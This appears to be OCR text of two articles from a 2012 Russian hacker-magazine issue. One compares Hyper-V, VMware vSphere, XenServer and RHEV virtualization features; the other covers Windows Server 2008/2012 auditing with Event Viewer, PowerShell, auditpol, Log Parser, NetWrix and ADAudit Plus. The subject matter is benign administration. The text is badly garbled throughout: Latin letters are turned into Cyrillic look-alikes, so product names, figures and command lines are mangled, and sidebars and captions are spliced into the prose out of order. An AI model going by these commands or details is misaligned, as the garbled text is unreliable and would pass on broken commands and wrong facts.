Поддержка технологии 5Р-І0Ѵ (Біпдіе Ноо* 1/0 ѴИиаІігаііоп) 
для подключения устройств в ѴМ дает возможность использовать 
специфические функции, ранее доступные только с нативными 
драйверами, и повысить производительность. С 5Р-І0Ѵ сетевые 
карты разделяются на некие виртуальные функции, которые 
передаются ѴМ как физические устройства. Еще одна новинка — 
технология N11 МА (Ыоп-ІІпіІюгт Метогу Ассезз) повышает про- 
изводительность виртуальной машины за счеттого, что каждый 
СРІІ обращается к «своей» части ОЗУ и тем самым уменьшаются 
накладные расходы на адресацию. При запуске ѴМ она привязы- 
вается к определенному узлу ЫІІМА, с которым и работает, если 
ресурсов достаточно. 

Предугадать, сколько потребуется ОЗУ, довольно сложно, 
поэтому обычно устанавливают рекомендуемое или большее 
значение, «чтобы не тормозило», в итоге часть ресурсов простаи- 
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Консоль управления ѴМѵѵаге ѵБрНеге СІіепі 



вает. Теперь можно задать минимальное и максимальное значение 
выделяемой памяти, после запуска ѴМ освободит лишнюю память, 
если в ней нет необходимости. Причем установить эти значения 
можно буквально движением мышки на лету. Ранее для этого при- 
ходилось прибегать к РоѵѵегБЬеІІ, а то и останавливать машину. 

При использовании большого количества ѴМ возможна ситуа- 
ция, когда для перезагрузки одной из них потребуется выделить 
стартовое значение памяти, которое всегда выше минимального. 
Если на узле нет дополнительной памяти для перезапуска машины, 
задействуется функция Нурег-Ѵ Бтагі Радіпд, обеспечивающая 
нужный объем за счет файла подкачки узла виртуализации. 

В связи с всевозрастающей нагрузкой изменена и сетевая 
подсистема. Так, стало возможным объединить до 32 физических 
сетевых адаптеров (N10 Театіпд), повысив производительность 
и доступность. Но главное, появился полноценный виртуальный 
сетевой коммутатор (І_ауег 2) — Нурег-Ѵ ЕхІепзіЫе БѵѵіІсЬ, предо- 
ставляющий следующие возможности: изоляцию виртуальных 
машин через создание частных ѴІ_АЫ (Ргіѵаіе ѴІ_АМ), ограничение 
пропускной способности, установление прав доступа для портов 
через АСІ_, ѴІ_АЫ Тгипкіпд (работа с несколькими ѴІ_АЫ), монито- 
ринг, защиту от АРР БрооПпд и йНСР Бпооріпд атак. Управление 
возможно через РоѵѵегБЬеІІ и ѴѴМІ. Получить список командлетов 
РоѵѵегБЬеІІ просто: 



и. 



Р5> Се1:-СоттапсІ -СоттапсІТуре Стсііеі: *ѴМІ\Іе1:ѵѵогкАсІар1:ег* 
Р5> 6е1:-СоттапсІ -СоттапсІТуре Сшсііеі: *ѴМ$ыі1:сІі* 






ІСІ т- 1 




Настройка виртуального коммутатора в ѴМѵѵаге ѵБрЬеге 



Представлен открытый АРІ, поэтому можно ожидать разрабо- 
ток третьих фирм. Добавлена поддержка виртуальных адаптеров 
ѴИиаІ РіЬге СЬаппеІ для ѴМ, через которые они могут получить 
прямой доступ к ШЫ посредством МРІО (МиШраіЬ 1/0). 

Так как ѴѴіп2012 продвигается в том числе как платформа 
для частных и публичных облаков, появилась возможность сбора 
биллинговой информации при помощи функции Нурег-Ѵ Резоигсе 
Меіегіпд, предоставляющей метрики по значению загрузки СРІІ 
и РАМ, объему дискового пространства, входящему/исходящему 
трафику. По умолчанию эта функция выключена, для активации 
следует использовать командлет ЕпаЫе-ѴМРезоигсеМеІегіпд. 
Интервал сбора по умолчанию установлен в один час, изме- 
нить его можно с точностью до минуты при помощи командлета 
Резой гсеМеІегіпдБаѵеІпІегѵаІ. 



ѴМѴѴАКЕ ЕЗХІ/ѴЗРНЕРЕ 



Основой продуктов виртуализации ѴМѵѵаге ( ѵтѵѵаге.сот ) является 
бесплатный гипервизор ѴМѵѵаге ЕБХі, представляющий собой ОС 
размером 300 Мб, которая устанавливается на чистое железо (Ьаге- 
теіаі). Его главная задача — создание, запуск виртуальных машин 
на хосте и управление ими. Можно использовать сколько угодно 
ЕБХі, но каждая будет управляться из отдельной консоли. Цен- 
трализованное управление серверами и виртуальными машинами 
реализовано в ѴМѵѵаге ѵБрЬеге, поэтому, чтобы понять все возмож- 
ности, следует рассматривать оба этих решения. На момент написа- 
ния статьи актуальной была версия 5.1, ее и будем разбирать. 



БСѴММ 2012: ЦЕНТР УПРАВЛЕНИЯ ПОЛЕТАМИ 



Традиционно к выходу новой серверной ОС 
МісгозоК обновляет и семейство средств 
управления Бузіет Сепіег. Функционал ѴИиаІ 
МасЫпе Мападег 2012 обновлен с учетом новых 
веяний — организации приватного/публич- 
ного облака, предоставления ИТ-технологий 
какуслуги и сервис-ориентированного подхода 
в управлении. Главная новость — возможность 
управлять ѴМ, запущенными не только на плат- 
форме Нурег-Ѵ, но и в ѴМѵѵаге и Сіігіх ХепБегѵег. 
Все ресурсы хостов в интерфейсе ѴММ2012 
видны как фабрика ресурсов (ЕаЬгіс), запу- 
ская ѴМ, мы выделяем ей ресурсы фабрики. 



Появилась функция, аналогичная ОЫгіЬЩесі 
Резоигсе ЗсЬесІиІег от ѴМѵѵаге, когда рабочая 
нагрузка между серверами внутри кластера 
выравнивается, в случае перегруза ѴММ дина- 
мически перемещает ѴМ на другие узлы. Если 
же ресурсы излишни, ѴММ умеет отключать 
ненужные узлы и включать при необходимо- 
сти, экономя электроэнергию. Для быстрого 
развертывания ѴМ используются библиотеки, 
шаблоны и настраиваемые профили. При этом 
ѴММ способен обнаруживать компьютеры в 
сети без установленной ОС и автоматически 
накатывать на них ОС с Нурег-Ѵ. Консоль по- 



зволяет выполнить Р2Ѵ- и Ѵ2Ѵ-конвертацию. 
Возможна упаковка приложений для разверты- 
вания с помощью ѴММ 2012 с использованием 
Бегѵег Арріісаііоп Ѵігіиаіігаііоп (Бегѵег Арр-Ѵ). 
Инструмент ѴММ Бегѵісе Тетріаіе Оезідпег 
позволяет создать сервисный шаблон, кото- 
рый затем используется для развертывания 
сервиса. Возможен экспорт/импорт сервисных 
шаблонов, масштабирование сервиса (до- 
бавление ѴМ). Сам ѴММ теперь может работать 
в кластере. Появился портал самообслужива- 
ния БеИБегѵісе, позволяющий пользователям 
самостоятельно управлять частным облаком. 
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СіІгіхХепЗегѵегб.О поддерживает все современные ОС 



Начну с того, что в линейке ѴМѵѵаге появился новый продукт — 
пакет автоматизации виртуальной инфраструктуры ѴМѵѵаге ѵСІоисІ 
Биііе, объединяющий ѴМѵѵаге ѵБрбеге, виртуальное хранили- 
ще ѵБрЬеге Біогаде Аррііапсе и средства катастрофоустойчивости 
виртуальной инфраструктуры ѴМѵѵаге Бііе Ресоѵегу Мападег. 

Наверное, самим большим разочарованием релиза является 
ограничение на физическую память хоста в 32 Гб в бесплатной 
версии Е5ХІ. Если РАМ сервера превышает 32 Гб, то ЕБХі не будет 
загружаться. Для платных версий этот лимит снят. Наличие такого 
ограничения спорно: с одной стороны, бесплатная версия предна- 
значена для тестирования и для 50 НО, с другой — современные 
приложения все более прожорливы, и 32 Гб — это уже немного, 
а конкуренты не спят. Лицензирование будет учитывать только ко- 
личество СРІІ. Максимальный размер памяти остался без измене- 
ний — 1 Тб. Среди других ограничений версии Ргее можно отметить 
отсутствие распределенных сервисов виртуализации (ѵМоЛоп, НА, 
йР5, Біогаде йР5, клонирование ѴМ), невозможность сохранения 
конфигурации через ѵСІ_І и АРІ в режиме только для чтения. 

Несколько упрощено управление хостом. Локальные пользо- 
ватели с правами администратора получают полный доступ к зЬеІІ 
без «5іі», неактивные сессии автоматически отключаются. Упро- 
щены процедуры мониторинга и аудит активности хоста. 

Кроме поддержки новых ОС (в частности, ѴѴіп8/201 2) и обо- 
рудования, заявлен новый, 9-й уровень абстракции оборудова- 
ния «Ѵегзіоп 9 ѵИиаІ Иагсіѵѵаге», включающий в себя поддержку 
новых процессоров АМй РіІесІ гіѵег и Іпіеі Іѵу Вгісіде / Бапсіу Вгісіде, 
технологий ѴТ-х/ЕРТ (Ехіепбесі Раде ТаЫез) и АМй-Ѵ/РѴІ (РарісІ 
ѴИиаІігаЛоп Іпсіехіпд) и ряда инструкций, если они реализованы 
на физическом СРІІ (РОРАЫО, Р0Р5ВА5Е, Р005ВА5Е, х2АРІС и дру- 
гие). Функция Ітргоѵеб СРІІ ѴИиаІігаІіоп позволяет «пробрасы- 
вать» в ѴМ больше функций физического СРІІ, появились счетчики 
производительности СРІІ. Увеличено количество ѵСРІІ на одну ѴМ 
с 32 до 64. Возможна виртуализация внутри виртуальных машин, 
вроде ѴѴіпсІоѵѵз ХР Мосіе (ѴИиаІ Нагсіѵѵаге-Аззізіесі ѴИиаІігаІіоп). 

Поддерживаются виртуальные графические модули (ѵбРІІ) 
и 30-графика для гостевых ОС, эти функции будут полезны для 
виртуальных ПК на ѴМѵѵаге Ѵіеѵѵ, использующих возможности 
ЫѴЮІАѴ6Х. 

Большим плюсом является то, что ѵСепІег 5.1 совместим с ЕБХі, 
начиная с 3.x (устанавливается в меню « Е сі И: БеШпдз — > Беіесі 
сотраЬМіІу»), поэтому можно не спешить обновлять свои серверы 
до последней версии. Появились два новых режима разверты- 
вания: «зіаіеіезз сасЫпд» и «зіаіеіші іпзіаііз». Первый позволяет 
развернуть хост ЕБХі из кеша при недоступности сервера Аиіо 
йеріоу, а при использовании второго варианта первоначальная 
загрузка хоста ЕБХі идет по РХЕ, а все остальное — с выделенного 
загрузочного диска. 
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Подключение к консоли удаленного хоста в ХепСепІег 

Подсистема хранения также претерпела изменения. Новый 
формат дисков БЕБрагзе ѴМйК (Брасе-ЕНчсіепІ Брагзе) позволяет 
«вернуть» системе хранения удаленные и неиспользуемые блоки 
виртуального диска в гостевой ОС. Ранее размер прироста блока 
был равен 4 Кб, теперь же его можно тонко регулировать, выби- 
рая оптимальное соотношение между использованием дискового 
пространства и нагрузкой на хранилище за счет размера блока. 
Появилась возможность загрузки через РСоЕ (ЕіЬге СЬаппеІ оѵег 
ЕіЬегпеі). 

В новом зіогаде АРІ реализована поддержка полноценных ѴААІ 
ІМА5 снапшотов. В предыдущей версии ѵБрЬеге максимальное ко- 
личество хостов, которые могли использовать один файл в режиме 
для чтения в ѴМР5, равнялось восьми, теперь с введением нового 
режима блокировки оно увеличено до 32, что позволит, например, 
более эффективно клонировать ѴйІ, доступные через ЫРБ. 

Как и в Нурег-Ѵ 3.0, возможна живая миграция ѴМ между двумя 
ЕБХі, не подключенными к 5АІМ, при помощи ѵМоІіоп и Біогаде 
ѵМоііоп (подробнее — в «ѴМѵѵаге ѵБрЬеге 5.1 ѵМоІіоп АгсЫіесІиге, 
Регіюгтапсе апсі Вез* Ргасіісез», аоо.д І/ТІ Р9С ). Технология ѵБрЬеге 
Реріісаііоп Аррііапсе реплицирует ѴМ по І_АІМ и ѴѴАЫ в одном или 
разных кластерах и обеспечивает быстрое восстановление работы 
ѴМ. Количество узлов в кластере М5С5 (МісгозоЙ Сіизіег Бегѵісе) 
увеличено с двух до пяти. Добавилась возможность отслеживания 
характеристик функционирования 550-накопителей через специ- 
альный БМАРТ-плагин. 

Место средства бэкапа ѴМ ѵБрЬеге йаіа Ресоѵегу занял ѵБрЬеге 
йаіа Ргоіесііоп (ѴйР), построенный на базе популярного продукта 
ЕМС Аѵатаг. Он позволяет создавать резервные копии содержимо- 
го гостевой ОС виртуальной машины без использования агентов, 
в нем реализована поддержка СЬапдесІ ВІоск Тгаскіпд, дедупли- 
кация данных переменной длины (ѵагіаЫе-ІепдіЫ и одноэтапное 
восстановление. 

В ѵБрЬеге 0 ізІгіЬиІесІ БѵѵіІсЬ добавлена возможность проверки 
работоспособности сети (ІМеІѵѵогк НеаШп СЬеск) путем контроля 




ХАКЕР 11 /166/2012 



131 






5ѴИ/АСК 



Удобно, что неактвеат- 1 

ДИСК ТЕПЕРЬ МОЖЕТ БЫТЬ 
РАЗМЕЩЕН НА ЫР5т 
РАЗДЕЛЕ 



ѴЕАІМ, МТЕІ и Театіпд, реализован бэкап и восстановление кон- 
фигурации коммутатора, откат настроек. Появилась поддержка 
стандарта 5Р-І0Ѵ и многих других «мелочей»: поддержка префикса 
МАС-адреса в ѵСеп*ег, зеркалирование портов (Р5РАІМ и ЕР5РАІМ), 
поддержка І\Іе*РІоѵѵ 10, протокола 5ІММР ѵЗ и другое. 

Сообщается, что в версии 5.1 стандартный клиент ѵБрЬеге 
СІіеп* обновился в последний раз, далее будет вестись разработка 
только веб-клиента, использующего технологию РІазИ (написан 
с помощью АрасЬе РІех). 



СІТРІХ ХЕМБЕРѴЕР 



Платформа ХепБегѵег ( ) базируется на гипервизоре Хеп 

и обеспечивает все необходимые функции управления серверами 
виртуализации. Поддерживаются все востребованные техноло- 
гии: динамическая балансировка и перераспределение нагрузки, 
миграция виртуальных машин (І_іѵе Мо*іоп] между физическими 
серверами без прерывания обслуживания, «горячее» копиро- 
вание ѴМ и совместное использование разделяемых ресурсов 
(ХепМо*іоп), неограниченное количество серверов и виртуаль- 
ных машин, НідЬ АѵаіІаЬіІі*у, Р2Ѵ-конвертация и многое другое. 
Актуальной на сегодня является версия 6.0.2, вышедшая в марте 
2012 года, в ней многое сделано, чтобы повысить стабильность 
и производительность облачной инфраструктуры, ѴйІ и сетевых 
функций. Поддерживается до 1 Тб памяти хоста, до 16 ѵСРІІ и 128 
Гб ѵРАМ для виртуальной машины. Версия 6.0.2 построена на 



базе гипервизора Хеп 4.1 с планировщиком сгебі*2, который может 
обеспечивать работу больших систем (более 255 СРІІ), поддержи- 
вает СРТ и имеетулучшения по разделению ресурсов (СРІІ рооіз и 
раг*і*іопіпд]. Также Хеп 4.1 получил новый АРІ для управления до- 
ступом к памяти (тет_ассе55 АРІ], поддерживает расширение АѴХ 
х86 СРІІ, РХЕ-загрузку гостевых систем, работающих в режиме ап- 
паратной виртуализации (НѴМ). Из других изменений: переработан 
первый домен ботО, добавлена поддержка новых ОС, включая еще 
не вышедшие на тот момент ѴѴіп 8/2012 ( доо.д І/кЬ В N и ). Сам процесс 
развертывания хоста и гостевых ОС упрощен, пользователю пред- 
лагаются средства автоматизации выполнения типовых операций 
для получения максимальной отдачи от имеющихся ресурсов. 

Для установки ХепБегѵег на хост теперь достаточно одного 150. 

Стало возможным привязать к ѴйІ физический ОРІІ и организо- 
вать к нему прямой доступ, увеличив производительность. За счет 
использования технологии кеширования Іп*еІІіСасЬе теперь требу- 
ется меньше места для ѴйІ. 

В качестве сетевого стека применен виртуальный комму- 
татор Ореп ѵ5\л/і*сЬ ( орепѵ5ѵѵі*сЬ.огд ). позволяющий создавать 
группы адаптеров Ас*іѵе-Васкир N ІС Ьопбіпд и поддерживающий 
такие протоколы, как І\Іе*РІоѵѵ, зРІоѵѵ, Р5РАІМ, ЕР5РАІМ, СИ, І_АСР 
и 802. 1 ад . Теперь администратору под силу создавать облачные 
сети практически любой сложности. 

Функция Іп*едга*еб 5і*е Ресоѵегу, заменившая 5іогадеІ_іпк 
6а*еѵѵау 5і*е Ресоѵегу, позволяет реплицировать данные между 
массивами хранения с поддержкой быстрого восстановления и пе- 
реключения на резерв. Новый механизм может работать с любыми 
репозиториями хранения НВА или 5С5І. Удобно, что Неаг*Ьеа*-диск 
теперь может быть размещен на І\ІР5-разделе. Возможно создание 
единого виртуального модуля ѵАрр (Ѵіг*иаІ Аррііапсе) для несколь- 
ких ѴМ. Для экспорта и импорта используется формат ОѴР, при им- 
порте ѴМ-дисков и ОѴР-окружений из ХепСеп*ег мастер позволяет 
изменить параметры ѴМ (ѵСРІІ, ѵРАМ, виртуальные интерфейсы). 



ЗАКЛЮЧЕНИЕ 



Как видно из обзора, все разработки идут вровень, если что-то 
новое появляется у конкурента, оно сразу же реализовывается 
и в остальных решениях. ПЕ 




^ ■ 

СНИМАЕМ ШЛЯПУ ПЕРЕД КЕй НАТ 



Основой платформы Веб На* Еп*егргізе Ѵіг*иаІІ 2 а*іоп ( гебЬа*. 
сот/ргото/гбеѵЗ ), предназначенной для организации управ- 
ления виртуальной инфраструктурой, является дистрибутив 
Веб На* Еп*егргІ5е І_іпих 6 с технологией виртуализации КѴМ 
(КегпеІ Ѵіг*иаІ МасЫпе) и наработками компании Оитгапе*. 
Компоненты доступны под б N11 6РІ_, применяемые техноло- 
гии можно встретить в других проектах, в частности оѴіг*. 
Первый релиз был представлен в конце 2009 года, в начале 
2012-го вышла третья версия. На сегодняшний день под- 
держиваются: І_іѵе Мідга*іоп, НідИ аѵаіІаЬіІі*у, управление 
образами, мгновенные снимки, поддержка ѴРІ и прочее. 

Для управления используется Веб На* Еп*егргізе Ѵіг*иаІіга*іоп 
Мападег, который теперь является баѵа-приложением, рабо- 
тающим на платформе бВозз. Также стали доступны: ролевая 
модель доступа администраторов, новая подсистема отчетов 
и ВЕ5Т*иІ АРІ для конфигурирования из сторонних приложе- 
ний. Появился портал управления, позволяющий пользо- 
вателям самим настраивать ѴМ. Для обеспечения уровня 
безопасности инфраструктура зѴіг* позволяет использовать 
5ЕІ_іпих. В качестве СУБД вместо М5 БОЕ Бегѵег теперь ис- 
пользуется Роз*дге50Е. Поддерживается до 160 логических 



СРІІ и 2 Тб ОЗУ для хостов, а также до 64 логических СРІІ 
и 512 Гб ОЗУ для гостевых систем. Для гостевых ОС добав- 
лена поддержка больших страниц памяти (Тгап5рагеп* Ниде 
Радев): 2 Мб вместо 4 Кб, что позволит увеличить произво- 
дительность за счет меньшего количества операций чтения. 
Поддержка функции динамического увеличения базового 
размера адресуемых страниц памяти Тгапзрагеп* Ниде Радев 
уменьшает число используемых ТЕВ-блоков (ТгапзІа*іоп 
Еооказібе Ви**ег) и увеличиваеттем самым производитель- 
ность. Паравиртуализированный контроллер прерываний 
для ѴМ х2АРІС уменьшает нагрузку от работы гостевых ОС, 
увеличивая производительность в случае интенсивной 
генерации прерываний. Аналогичные функции, но для ввода/ 
вывода выполняет Азупс-ІО. Протокол 5РІСЕ, используемый 
для подключения клиентов, был оптимизирован для ѴѴАІМ- 
соединений: реализована поддержка динамического сжатия, 
подстройка глубины цвета и эффектов, улучшена поддержка 
Еіпих-десктопов. Поддерживаются локальные диски для ѴМ 
(пока без Еіѵе Мідга*іоп). С целью увеличения производи- 
тельности сетевой стек ѵбоз*-пе* перенесен из пространства 
пользователя на уровень ядра. 



• Подробно о 5К-І0Ѵ: 

И**р://ѵои*и.Ье/ 

НКН5к8МѵссІа: 

* подробнее об 
архитектуре 
подсистемы 
хранения в ѴМѵѵаге 
ѵЗрІіеге 5.1: 
аоо.аІ/ТІР9С . 



ішп 

При обновлении 
ѴМѵѵаге Іооіз 5.1+ 
перезагрузка 
больше 

не потребуется. 
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ОБЕСПЕЧИВАЕМ ТОТАЛЬНЫЙ АУДИТ 
ѴѴІЫ00ѴѴ5-СЕТИ 



Сеть, как живой организм, постоянно меняется и развивается. Пользователи добавляют/считывают/ 
удаляют файлы, коллеги-админы корректируют политики, параметры доступа и системные настройки. 
Ты всегда должен знать, кто, когда и что изменил, кому делегированы права, кто зашел в систему, 
получил доступ к ресурсу или удалил важные данные. Без аудита нельзя построить действительно 

безопасную сеть. 
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5УЫ/АСК 




Начиная с ѴѴіп2к8ГС2, появилась возможность связать настраиваемые 
представления с задачей 



АУДИТ В ѴѴІМРОѴѴ5 5ЕРѴЕК 2008/2012 



В ѴѴіп2к8 система аудита претерпела значительные изменения. 

Так, количество отслеживаемых параметров было увеличено на 53. 
Стали отслеживаться все попытки создания, изменения, пере- 
мещения и восстановления объектов. В журнал записываются 
предыдущее и текущее значения измененного атрибута и учетная 
запись пользователя, выполнившего операцию. Управлять аудитом 
стало возможно на уровне категорий, что позволяет более тонко 
отобрать нужные параметры. Например, политики аудита Асііѵе 
йігесіогу разделены на четыре категории, в каждой из которых 
настраиваются специфические параметры: 

• ОігесІогуБегѵісе Асеева — доступ кслужбе каталогов; 

• ОігесІогуБегѵісе СЬапдез — изменения службы каталогов; 

• ОігесІогуБегѵісе Реріісаііоп — репликация службы каталогов; 

• Оеіаііесі ОігесІогуЗегѵісе Реріісаііоп — подробная репликация 
службы каталогов. 

Аудит внедряется при помощи глобальной политики аудита 
(ОІоЬаІ Аисііі Роіісу, САР), списка управления доступом (5АСЦ 
Бузіет ассезв сопігоі Іізі) и схемы. Для просмотра записей в журна- 
ле безопасности предложена консоль «Просмотр событий» (Еѵепі 
Ѵіеѵѵег), позволяющая фильтровать события по дате при помощи 
настраиваемого представления: по уровню (критическое, пред- 
упреждение, ошибка и так далее), источнику, коду, пользователю 
или компьютеру и ключевым словам. Один раз настроив и сохранив 
такой фильтр, затем можно быстро получить нужные данные одним 
щелчком. Большой минус системы аудита ѴѴіп2к8 в том, что опо- 
вещение не предусмотрено, админ может просматривать события 
только при необходимости (например, по жалобе пользователя). 

В ѴѴіп2к8Р2 появилась возможность связывать события и настра- 
иваемые представления с задачей и при срабатывании правил 
запустить программу, отправить сообщение по е-таіі или вывести 
сообщение на рабочий стол. Забегая чуть вперед, скажу, что из этих 
трех сценариев в ѴѴіп2012 рекомендуемым является только первый. 

Еще один инструмент, автоматизирующий процесс анализа ин- 
формации, — набор командлетов для работы с журналами локаль- 
ной или удаленных систем *- ЕѵепІІод и *-ѴѴіпЕѵепЕ Просмотреть 
полный список с указанием их назначения можно командой: 



В ѴѴіп2012 появились политики аудита на основе выражений 

В \А/іп2012 возможности аудита были расширены. Появле- 
ние динамического контроля доступа (Оупатіс Асеева Сопігоі) 
предоставило возможность задавать ехргеввіоп-ЬавесІ поли- 
тики аудита на основе выражений и свойств объекта, позволяя 
получить более точную информацию обо всех попытках доступа 
к важным документам. Например, можно настроить политику 
аудита всех пользователей, не имеющих необходимого доступа, 
но пытавшихся прочитать документ. Активируется такая по- 
литика непосредственно в свойствах файла или папки или при 
помощи аудита доступа к глобальным объектам (ЗІоЬаІ О Ь і е с I 
Ассевв АибШпд). Настроенные политики при каждом обращении 
пользователя к файлам генерируют события (с номерами 4656, 
4663), содержащие атрибуты файлов, которые можно отбирать 
при помощи фильтров. 

Но наверное, одним из самых важных нововведений стала воз- 
можность отслеживать попытки обращения к съемным устрой- 
ствам. Система генерирует события с двумя Ю: успешное обраще- 
ние (4663) и неудачная попытка (4656). 

По умолчанию для клиентских систем аудит отключен, для 
серверных активна только подкатегория «Доступ к службе 
каталогов Асііѵе йігесіогу». Для управления политиками пред- 
назначен редактор управления групповыми политиками. В ветке 
Политики/Параметры безопасности/Локальные политики/По- 
литика аудита находятся следующие категории: аудит входа 
и событий входа в систему, доступа к объектам, изменения 
политики, использование привилегий, отслеживание процессов, 
системных событий, управление учетными записями. Перехо- 
дим сюда и указываем контролируемые события (успех, отказ). 
Более тонко политики устанавливаются в Политики/Параметры 
безопасности/Конфигурация расширенной политики аудита/По- 
литики аудита. 

В Ѵ\/іп201 2 для настроек можно использовать утилиту команд- 
ной строки аисМроІ. Чтобы получить полный список ЗАР с установ- 
ленными параметрами, достаточно ввести команду: 



ДЛЯ ЧЕГО НУЖЕН АУДИТ? 



Р5> СеТ-НеІр *-Еѵеп1:1о§ 

Например, просмотрим события с Ю 4720 (создание учетной 
записи): 

Р5> 6е - Е-Еѵеп'ЕІ.о§ зесигіііу | ?{$_.еѵеп1:ісІ -ед 4720} 



Аудит решает пять основных задач: выявить несанкционированный 
доступ; определить причины дыры в системе безопасности; 
предотвратить нарушения безопасности; отследить вход 
пользователей в систему и деятельность администраторов; 
обеспечить соответствие нормативным требованиям. 
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Постановка на контроль 



> аисііііроі /1І5І= /зиЬса1іе§огу : * 

Активируем аудит съемных носителей: 

> аисііііроі /зеіі /зиЬса1іе§огу : «Съемные носители»^ 

/зиссезз : епаЫе /-Раііиге : епаЫе 

Система аудита ѴѴіпсІоѵѵз позволяет собрать достаточно много 
информации, ее главный недостаток состоит в том, что нужно 
знать, что искать. События с одним номером могут означать изме- 
нения самых разных объектов, одно действие пользователя может 
генерировать десяток событий, и пропустить что-то действительно 
важное очень легко. Все это требует знаний и опыта. 

Информация, собранная системой аудита, используется при 
расследовании инцидентов, а поэтому многие стандарты без- 
опасности (НІРАА, 50Х, РСІ и другие) требуют, чтобы журналы 
сохранялись длительное время (до семи лет). Журналы ѴѴіпсІоѵѵз по 
умолчанию ограничены 128 Мб, и при большом количестве событий 
они будут быстро перезаписаны. Избежать этого можно, устано- 
вив в свойствах журнала консоли Еѵепі Ѵіеѵѵег больший размер и 
активировав параметр «Архивировать журнал при заполнении. Не 
перезаписывать события». Но об архивации и поиске информации 
в этом массиве (если такая необходимость возникнет) администра- 
тору придется позаботиться самому. Стоит отметить, что встроен- 
ный аудит доступа к файлам создает большую дополнительную 
нагрузку на сервер. 

Резюмируя сказанное: предложенная разработчиками ѴѴіпсІоѵѵз 
система аудита свою функцию выполняет исправно, но она неудоб- 
на в использовании. Многие администраторы прибегают к помощи 
сторонних приложений, которые обеспечивают консолидацию 
логов с разных источников, лучший аудит изменений, меньший 
объем данных. 



N ЕТѴѴРІХ СНАИбЕ РЕРОРТЕР БЫТЕ 



Компания ЫеіѴѴгіх ( пеіѵѵгіх.ги ) предлагает несколько решений 
под общим названием Сбапде Рерогіег, обеспечивающих аудит 
отдельных компонентов: Асііѵе йігесіогу, 6Р0, файлового сервера, 
501 5егѵег, ѴМѵѵаге, 5ЬагеРоіп1, сетевой инфраструктуры и других. 
Есть и комплексные продукты СЬапде Рерогіег 5иіІе и Епіегргізе 
Мападетепі 5иііе, в которых интегрированы все возможности. Если 
используется МісгозоИ 5узІет Сепіег Орегаііопз Мападег, можно 
установить расширение, добавляющее возможность контроля из- 
менений Ай, 6Р0 и ЕхсЬапде непосредственно из консоли 5С0М. 
Решение от ІМеіѴѴгіх может интегрироваться с некоторыми 51 ЕМ 
(Зесигііу Іпіюгтаііоп апсі Еѵепі Мападетепі) системами, что откры- 
вает еще большие возможности по аудиту и обработке инцидентов. 

Все СЬапде Рерогіег доступны в двух версиях: платной и 
бесплатной. Возможности последней традиционно урезаны, но 
их с головой хватает для небольших и средних организаций. Ин- 
терфейс продуктов N еіѴѴгіх не локализован, но выполнен вполне 
традиционно, поэтому разобраться с настройками несложно. 




Активация аудита в редакторе групповых политик 



Большинство установок производится при помощи мастеров, 
которые избавляют администратора от рутинных операций и не 
требуют особой подготовки. Например, чтобы активировать аудит, 
достаточно нажать одну кнопку в мастере Аисііі Сопіідигаііоп 
ѴѴігагсІ. Также этот мастер выдает ряд рекомендаций, как улуч- 
шить работу системы аудита. 

После установки создается снимок, с которым и сравниваются 
настройки. В случае изменения генерируются полные отчеты с ин- 
формацией: кто, где и когда их произвел модификацию, значение 
параметра до и после. В бесплатной версии отчет представляет 
собой ежедневный дайджест, который отправляется на е-таіі, 
указанный во время установки. В платной версии количество от- 
четов увеличено: зпарзбоі, изменения в настройках на указанный 
момент, сброс пароля Ай и так далее. Снимки контролируемых 
объектов по умолчанию производятся каждые 10 минут, и на их 
основании строится отчет, отражающий изменения в динамике. 
Или, например, ІМеІѵѵогк Іпітазігисіиге СЬапде Рерогіег собирает 
данные с сетевых устройств, поддерживающих 5ІЧМР, создает от- 
четы о настройках и изменениях и информирует о появлении новых 
систем в сети. Обо всех критических изменениях администратор 
уведомляется в реальном времени. 

Инструмент СЬапде РоІІЬаск ѴѴігагсІ позволяет произвести откат 
до предыдущего значения с любой точки, в бесплатной версии 
«запоминаются» только четыре дня. Платная версия поддерживает 
несколько доменов, продолжительное хранение архива измене- 
ний, библиотеку отчетов, подписки, 5парзЬоІ Рерогііпд, интегра- 
цию со 5С0М. 

Установка ІМеіѴѴгіх СЬапде Рерогіег возможна на любой ком- 
пьютер, работающий под управлением ѴѴіпсІоѵѵз ХР 5РЗ и выше, 
с установленным 115 (в 64-битных системах в режиме 32-битной со- 



ПАРСИМ ЛОГИ, ИСПОЛЬЗУЯ СИНТАКСИС 501- 



Недостатки штатной системы аудита разработчики из МісгозоК 
попытались отчасти компенсировать с помощью бесплатной 
утилиты І_од Рагзег ( доо.аІ/Ы III ), которая позволяет по запросу 
парсить журналы с локального или удаленного сервера. 

Чтобы задать параметры, используется 501-подобный язык, 
благодаря чему и достигается полная свобода в выборе 
информации, ее обработке, сортировке и группировке. 
Например, выборка данных из журнала безопасности: 



> Іо^рагзег "5ЕІ.ЕСТ РІ5ТІІМСТ ЕѵепІіІР РКОМ зесипіііу" 

І_од Рагзег может запрашивать данные об объектах в Ас- 
ііѵе йігесіогу, работает с журналами N5 и ЕхсЬапде 5егѵег. 
Результат сохраняется в файл (ѴѴЗС, С5Ѵ, ХМІ_), 501-базу, 
эузіод, изображение или выводится в консоль. Дополнительно 
разработан графический интерфейс и библиотека запросов І_од 
Рагзег Зіисііо ( оо.дІ/ѵдОсІТ ). 



мил 

В видеоролике 
мы познакомимся 
с настройками 
системы аудита 
ѴѴіпсІоѵѵз Бегѵег 
2012 и разберем, как 
получать нужную 
информацию в 
консоли Еѵепі 
Ѵіеѵѵег и с помощью 
командлетов 
РоѵѵегБЬеІІ. 
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вместимости). Для хранения отчетов используется М5 5СІІ_ Бегѵег 
от 2005, поддерживается и Ехргезз ЕсІШоп. Лицензируется ЫеіѴѴгіх 
по количеству активных пользователей, в стоимость включен год 
техподдержки. 



А0АІШІТРШ5 



Корпорация 2оЬо ( тападее пе.сот ) предлагает ряд продуктов 
для аудита, управления инфраструктурой и ведения отчетов. Для 
нас представляет интерес АБАисІіІ РІиз, позволяющий отслежи- 
вать все изменения в объектах АО, СРО, учетных записях групп и 
пользователей, установки разрешений, события входа и прочее. 

По результатам строятся подробные отчеты, кто, когда и какое 
действие выполнил, выводится значение до и после изменения 
и прочие характеристики. Для файлового сервера (в том числе и 
Раііоѵег Сіизіегз) производится аудит файлов, папок, сетевых шар 
и параметров доступа. Результат администратор может экспорти- 
ровать в файл формата ХІ_5, НТМІ_, РБР и С5Ѵ. Фильтр позволяет 
настроить предупреждения о самых важных событиях по е-таіі. 
Например, предупреждать в случае неудачной попытки входа 
администратора на контроллер домена. Отчеты можно запускать 
по расписанию, результат сохраняется в файл, по е-таіі приходит 
